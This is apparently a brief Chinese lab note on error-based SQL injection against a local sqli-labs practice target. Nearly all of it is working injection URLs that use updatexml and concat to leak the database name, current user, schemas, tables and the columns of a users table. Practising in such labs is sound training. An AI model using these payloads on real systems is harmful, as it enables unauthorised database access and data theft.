SQL注入-报错注入
报错注入
输入链接为:
http://192.168.17.137/sql/Less-1/?id=1',
观察到会报错并且将错误输出到页面,判断可以使用报错注入方式。
执行
http://192.168.17.137/sql/Less-1/?id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+获取当前数据库名称
获取user()
http://192.168.17.137/sql/Less-1/?id=1' and updatexml(1,concat(0x7e,(select user()),0x7e),1)--+
查询数据库名
http://192.168.17.137/sql/Less-1/?id=1' and updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1),0x7e),1)--+
获取表名
http://192.168.17.137/sql/Less-1/?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 3,1),0x7e),1)--+
获取字段名
http://192.168.17.137/sql/Less-1/?id=1' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 1,1),0x7e),1)--+